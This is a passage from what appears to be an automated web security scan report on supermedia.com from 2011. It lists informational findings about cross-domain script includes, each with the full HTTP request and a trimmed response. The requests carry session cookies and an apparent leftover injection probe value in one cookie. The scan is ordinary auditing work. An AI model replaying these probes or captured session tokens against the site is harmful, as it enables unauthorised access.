...[SNIP]...

19.240. http://www.supermedia.com/help/yellow-pages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /help/yellow-pages

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/yellow-pages HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:24:36 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Yellow Pages Help | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.241. http://www.supermedia.com/local-search-marketing/do-it-yourself  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /local-search-marketing/do-it-yourself

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /local-search-marketing/do-it-yourself HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:27:02 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Do-it-yourself Search Marketing | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.242. http://www.supermedia.com/local-search-marketing/services  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /local-search-marketing/services

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /local-search-marketing/services HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:27:03 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Search Marketing Services | SuperMedia.com Advertising</title>



...[SNIP]...
<!-- SMLocal
By use of this code snippet, I agree to the Brightcove Publisher T and C
found at http://corp.brightcove.com/legal/terms_publisher.cfm.
-->

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Reporting
By use of this code snippet, I agree to the Brightcove Publisher T and C
found at http://corp.brightcove.com/legal/terms_publisher.cfm.
-->

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!--
By use of this code snippet, I agree to the Brightcove Publisher T and C
found at http://corp.brightcove.com/legal/terms_publisher.cfm.
-->

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.243. http://www.supermedia.com/media-network/affiliate-program  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /media-network/affiliate-program

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media-network/affiliate-program HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:25:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Affiliate Program | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.244. http://www.supermedia.com/media-network/market-coverage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /media-network/market-coverage

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media-network/market-coverage HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:25:01 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Market Coverage| SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.245. http://www.supermedia.com/media-network/mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /media-network/mobile

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media-network/mobile HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:24:57 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Mobile Applications | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.246. http://www.supermedia.com/media-network/online-ad-network  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /media-network/online-ad-network

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media-network/online-ad-network HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:24:46 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia's Online Ad Network | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.247. http://www.supermedia.com/media-network/our-brands  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /media-network/our-brands

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media-network/our-brands HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:24:44 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Brands | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.248. http://www.supermedia.com/media-network/sem-partners  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /media-network/sem-partners

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media-network/sem-partners HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:24:56 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia's Search Marketing Partners | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.249. http://www.supermedia.com/national-agency-products/media-kit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /national-agency-products/media-kit

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /national-agency-products/media-kit HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:28:28 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Media Kit | SuperMedia.com Advertising</title>


<li
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.250. http://www.supermedia.com/online-advertising  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /online-advertising

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /online-advertising HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:26:36 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Local Search Marketing | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.251. http://www.supermedia.com/online-advertising/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /online-advertising/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /online-advertising/ HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:21:34 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Local Search Marketing | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.252. http://www.supermedia.com/packaged-solutions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /packaged-solutions

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /packaged-solutions HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:26:52 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Advertising Packages for Businesses | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.253. http://www.supermedia.com/packaged-solutions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /packaged-solutions/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /packaged-solutions/ HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:22:08 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Advertising Packages for Businesses | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.254. http://www.supermedia.com/packaged-solutions/auto-dealer-packages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /packaged-solutions/auto-dealer-packages

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /packaged-solutions/auto-dealer-packages HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:22:22 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Auto Dealer Marketing Packages | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.255. http://www.supermedia.com/packaged-solutions/business-profile-packages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /packaged-solutions/business-profile-packages

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /packaged-solutions/business-profile-packages HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:22:15 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Business Profile Packages | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.256. http://www.supermedia.com/packaged-solutions/multi-product-packages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /packaged-solutions/multi-product-packages

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /packaged-solutions/multi-product-packages HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:22:11 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Multi-Product Marketing Packages | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.257. http://www.supermedia.com/press  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /press

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:27:29 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Press Releases | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.258. http://www.supermedia.com/press/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /press/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/ HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:22:27 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Press Releases | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.259. http://www.supermedia.com/print-advertising  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /print-advertising

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /print-advertising HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:26:38 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Yellow Pages Print Advertising | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.260. http://www.supermedia.com/print-advertising/white-pages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /print-advertising/white-pages

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /print-advertising/white-pages HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:27:16 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>White Pages Advertising | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.261. http://www.supermedia.com/print-advertising/yellow-pages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /print-advertising/yellow-pages

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /print-advertising/yellow-pages HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
